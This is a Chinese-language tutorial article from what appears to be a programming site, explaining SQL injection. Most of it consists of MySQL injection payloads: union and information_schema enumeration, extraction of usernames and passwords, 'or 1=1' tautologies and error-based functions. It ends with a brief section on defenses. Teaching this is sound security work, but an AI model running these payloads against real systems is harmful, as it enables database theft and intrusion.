首页 > 资讯 > 后端开发 > 其他教程 >sql注入数据库原理详情介绍

202

分享到

sql注入数据库原理详情介绍

2024-04-02 19:04:59 202人浏览薄情痞子

摘要

目录1 介绍2 一般步骤3 注入3 函数3.1 常用的系统函数3.2 字符串连接函数3.2.1 concat() 函数3.2.2 concat_ws() 函数3.

1 介绍

SQL注入漏洞主要是由于，在请求的时候没有做严格的过滤，导致传入的语句被当做SQL语句被执行，从而导致数据库受损（被脱库、删除、甚至数据付权限沦陷）

2 一般步骤

SQL注入点探测：

判断什么地方存在SQL注入点，通常在表单，文章查询等与数据库有关操作的页面。

收集后台数据库信息：

不同的数据库的注入方法、函数各不相同，因此注入前要判断数据库的类型。

如：

特殊字符、单引号：让数据库返回错误

函数：

version()函数：MSQL专用

1 and version（）>0

猜测用户名和密码：

表名、字段名、字段数、用户名和密码。

查找 Web 后台管理入口：

可以使用目录扫描工具

入侵and破坏：

登录后台：上传木马、篡改网页、窃取信息。
进一步提权：入侵WEB服务器和数据库服务器。

3 注入

测试数据;

+---------------+----------------------------------+
| isbn          | title                            |
+---------------+----------------------------------+
| 9787302458210 | SQL Server 从入门到精通（第2版）    |
| 9787115496003 | 虚拟化技术应用与实践                |
| 9787302510109 | 算法设计与分析（第4版）             |
| 9787503442490 | 心灵密码                          |
| 9787503421884 | 雪狼                             |
| 9787539635835 | 龙头老太                          |
+---------------+----------------------------------+

3 函数

3.1 常用的系统函数

函数	作用
version()	Mysql版本
user()	数据库用户名
database()	数据库名
@@datadir	数据库路径
@@version_complie_os	操作系统版本

3.2 字符串连接函数

三大法宝：concat(),group_concat(),concat_ws()

3.2.1 concat() 函数

特点：concat(str1,str2,...)
返回结果为连接参数产生的字符串，如果任何一个参数为NULL，则返回值为NULL，可以有一个或多个参数。

1. 不使用字符连接函数：

select isbn,title from books limit 1;

+---------------+----------------------------------+
| isbn          | title                            |
+---------------+----------------------------------+
| 9787302458210 | SQL Server 从入门到精通（第2版）    |
+---------------+----------------------------------+

2.使用示例

一般我们都要用一个字符将各个项隔开，便于数据的查看

select concat(isbn,',',title) from books limit 1;

+------------------------------------------------+
| concat(isbn,',',title)                         |
+------------------------------------------------+
| 9787302458210,SQL Server 从入门到精通（第2版）    |
+------------------------------------------------+

3.2.2 concat_ws() 函数

CONCAT_WS() 代表 CONCAT With Separator ，是CONCAT()的特殊形式。第一个参数是其它参数的分隔符。分隔符的位置放在要连接的两个字符串之间。分隔符可以是一个字符串，也可以是其它参数。如果分隔符为 NULL，则结果为 NULL。函数会忽略任何分隔符参数后的 NULL 值。但是CONCAT_WS()不会忽略任何空字符串。 (然而会忽略所有的 NULL）。
特点：CONCAT_WS(separator,str1,str2,…)

使用示例

3.2.3 group_concat() 函数

GROUP_CONCAT函数返回一个字符串结果，该结果由分组中的值连接组合而成。

select bid,author,group_concat(bid) from books where author in('金勇先','方兆祥 著') group by bid;

就不演示了，sql语句如同上面

4 注入

4.1 联合查询 union 注入

使用联合查询进行的前提是我们进行注入的页面必须有显示位。

1、使用union

payload:

v' union select username from member where id=1#%

select 必须有相同的列，且各列的数据也都相同，同时，每条 SELECT 语句中的列的顺序必须相同。
联合查询可先在链接最后添加 order by X 基于随意数字的注入，根据页面的返回结果来判断站点中的字段数目。

select bid,author from books union select username from users;

2、 payload：a' order by 4#%

select bid,author from books order by 4#%;

select bid,author from books order by 2#%;

3、得到主查询由三个字段后，我们用union来做一个sql拼接。

pauload

a' union selec database(),user(),version()#%

select bid,author,title from books union selec database(),user(),version();

这里没有测试通过

4.2 information_schema 注入

information_schema数据库是mysql5.0系统自带的数据库，其中保存着关于MySQL服务器所维护的所有其他数据库的信息。

select group_concat(schema_name) from information_schema.schemata;

实际注入测试

5.2.1 获取所有数据库

类型：id=/wd=/name=

-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name) from information_schema.schemata

4.2.2 获取指定数据库的表

payload

a' union select table_schema ,table_name,3 from information_schema.tables where table_schema='library'

select bid,author,title from books union select table_schema ,table_name,3 from information_schema.tables where table_schema='library';

4.2.3 获取指定表的字段名

payload

a' union select table_name,column_name,3 from information_schema.columns where table_name='users'#%

select bid,author,title from books  union select table_name,column_name,3 from information_schema.columns where table_name='users';

4.2.4 获取字段值得内容

payload

 a' union select username ,passWord,3 from users#%

select bid,author,title from books union select username,password,3 from users;

4.3 基于报错信息注入

此方法是在页面没有显示位，但是 echomysql_error() 函数，在前端输出了错误信息的时候方能使用。
优点是注入速度快，缺点是语句较为复杂，而且只能用 limit 依次进行猜解。总体来说，报错注入其实是一种公式化的注入方法，主要用于在页面中没有显示位，但是用 echomysql_error() 输出了错误信息时使用。常见的select/insert/update/delete 注入都可以使用报错方式来获取信息。

4.3.1 三个常用报错函数

updatexml（）: 函数是MYSQL对XML文档数据进行查询和修改的XPATH函数
extractvalue（） : 函数也是MYSQL对XML文档数据进行查询的XPATH函数.
floor（）: MYSQL中用来取整的函数.

4.4 数字注入

or 1=1

4.5 搜索注入

在搜索框搜索的时候，成为搜索型。
数字型与字符型注入最大区别：数字型不需要单引号闭合，而字符串类型需要单引号闭合。

%xxx% or 1=1 #%&amp;#x27;

5 sql注入防御

对输入进行严格的转义和过滤
使用参数化（Parameterized）：目前有很多ORM框架会自动使用参数化解决注入问题,但其也提供了"拼接"的方式,所以使用时需要慎重!

到此这篇关于sql注入数据库原理详情介绍的文章就介绍到这了,更多相关sql注入数据库内容请搜索编程网以前的文章或继续浏览下面的相关文章希望大家以后多多支持编程网！

点击免费下载>>软考高级考试备考技巧/历年真题/备考精华资料

--结束END--

本文标题: sql注入数据库原理详情介绍

本文链接: https://www.lsjlt.com/news/167212.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑，方便收藏和打印～

下载Word文档

去做题

猜你喜欢

sql注入数据库原理详情介绍

目录1 介绍2 一般步骤3 注入3 函数3.1 常用的系统函数3.2 字符串连接函数3.2.1 concat() 函数3.2.2 concat_ws() 函数3....

99+

2024-04-02
数据库之SQL注入原理以及过程的简单介绍

1、产生SQL注入原因开发代码的时候没有全面考虑到网络安全性，特别是在用户交互时，没有考虑到用户提交的信息中可能破坏数据库，没有对输入的数据进行合法的过滤。SQL 注入过程目的性是...

99+

2024-04-02
网络安全及防御之SQL注入原理介绍

目录A.SQL注入概述什么是SQL注入SQL注入的原理SQL注入的地位SQL注入的来源SQL注入的主要特点SQL注入的危害B.SQL注入攻击SQL注入攻击SQL注入威胁表达方式SQL...

99+

2024-04-02
关于Redis数据库入门详细介绍

目录1、Redis是什么？2、Redis特点：单线程为何如此快?3、redis 对比 memcached4、redis 典型应用场景：5、Redis下载与安装：Redis服务...

99+

2024-04-02
SQL数据库十四种案例介绍

数据表 PRAGMA foreign_keys = OFF; -- ---------------------------- -- Table structure for ...

99+

2024-04-02
MySQL数据库锁机制的相关原理介绍

这篇文章主要讲解了“MySQL数据库锁机制的相关原理介绍”，文中的讲解内容简单清晰，易于学习与理解，下面请大家跟着小编的思路慢慢深入，一起来研究和学习“MySQL数据库锁机制的相关原理介绍”吧！　　不同于行...

99+

2024-04-02
轻量级数据库SQL Server Express LocalDb介绍

目录一、介绍1、SqlLocalDb2、轻量级数据库对比（LocalDB vs. SQL Express vs. Compact）二、安装这个SqlLocalDb1、通过VS Ins...

99+

2024-04-02
mysql数据库之索引详细介绍

目录思维导图简单理解索引模型的演变二叉查找树自平衡二叉树B树B+树聚集索引与二级索引总结如果你想深入了解为什么mysql可以快速的进行检索数据，那么你一定要来了解一下mysql的索...

99+

2024-04-02
MySQL数据库索引的详细介绍

这篇文章主要讲解了“MySQL数据库索引的详细介绍”，文中的讲解内容简单清晰，易于学习与理解，下面请大家跟着小编的思路慢慢深入，一起来研究和学习“MySQL数据库索引的详细介绍”吧！01、前言看了很多关于索...

99+

2024-04-02
C++函数重载介绍与原理详解

目录函数重载函数重载的概念函数重载的原理(名字修饰)总结：extern “C”函数重载函数重载的概念函数重载是函数的一种特殊情况，C++允许在同一作用域中...

99+

2024-04-02
Oracle数据库表空间超详细介绍

目录表空间概述表空间的分类创建表空间参数详解1、undo2、tablespace3、datafile datefile_spec14、MININUM EXTENT integer [k|m]5、blockSIZE int...

99+

2023-05-12

oracle表空间是什么 oracle 表空间查询 oracle表空间创建
oracle数据库导入TXT文件方法介绍

客户端连接数据库导入安装有oracle客户端，配好监听。以oracle数据库app用户的表user_svc_info为例<span >CREATE TABLE USER_SVC_INFO( PHONE varcha...

99+

2023-05-31

oracle 数据库 txt文件
MyBatis操作数据库的详细步骤介绍

这篇文章主要介绍“MyBatis操作数据库的详细步骤介绍”，在日常操作中，相信很多人在MyBatis操作数据库的详细步骤介绍问题上存在疑惑，小编查阅了各式资料，整理出简单好用的操作方法，希望对大家解答”My...

99+

2024-04-02
sql注入如何判断数据库类型

sql注入可以通过函数来判断数据库类型，例如：在mssql和mysql以及db2内，返回长度值是调用len()函数，而在oracle和INFORMIX则是通过length()来返回长度值。在mysql内，可以用@@version或是vers...

99+

2024-04-02
大数据处理必备！Java API中NumPy库的详细介绍！

在当今信息化时代，数据已经成为了企业发展的重要资源。大数据的处理和分析也成为了许多企业必须面对的问题。在这种情况下，NumPy库成为了数据处理的重要工具之一。本文将详细介绍NumPy库在Java API中的应用。一、NumPy库简介 N...

99+

2023-09-10

api numy 大数据
数据库中sql注入的示例分析

这篇文章将为大家详细讲解有关数据库中sql注入的示例分析，小编觉得挺实用的，因此分享给大家做个参考，希望大家阅读完这篇文章后可以有所收获。首先可能大家都会问什么是sqlSql是数据库的一种类型，是用来存储网...

99+

2024-04-02
数据库之SQL注入的示例分析

小编给大家分享一下数据库之SQL注入的示例分析，相信大部分人都还不怎么了解，因此分享这篇文章给大家参考一下，希望大家阅读完这篇文章后大有收获，下面让我们一起去了解一下吧！1、产生SQL注入原因开发代码的时候没有全面考虑到网络安全性，特别是在...

99+

2023-06-20
阿里云RDS数据库实例的详细介绍

阿里云RDS是阿里云提供的关系型数据库服务，它可以帮助用户快速搭建和管理数据库实例，提供稳定、安全、高效的数据存储和处理能力。在本文中，我们将详细介绍阿里云RDS数据库实例的特性和使用方法。一、阿里云RDS的优势架构简单：阿里云RDS提供...

99+

2023-11-07

阿里详细介绍实例
SQL Server数据库DATEADD的语法介绍及使用实例

DATEADD函数是SQL Server数据库中的一个内置函数，用于在指定日期上添加或减去指定的时间间隔。语法：DATEADD(da...

99+

2023-09-23

SQL Server数据库
如何避免数据库被sql注入攻击

避免数据库被sql注入攻击的方法：采用PreparedStatement预编译语句集，它内置了处理sql注入的能力，使用它的setXXX方法传值即可。使用正则表达式过滤传入的参数，例如：要引入的包：import java.util.rege...

99+

2024-04-02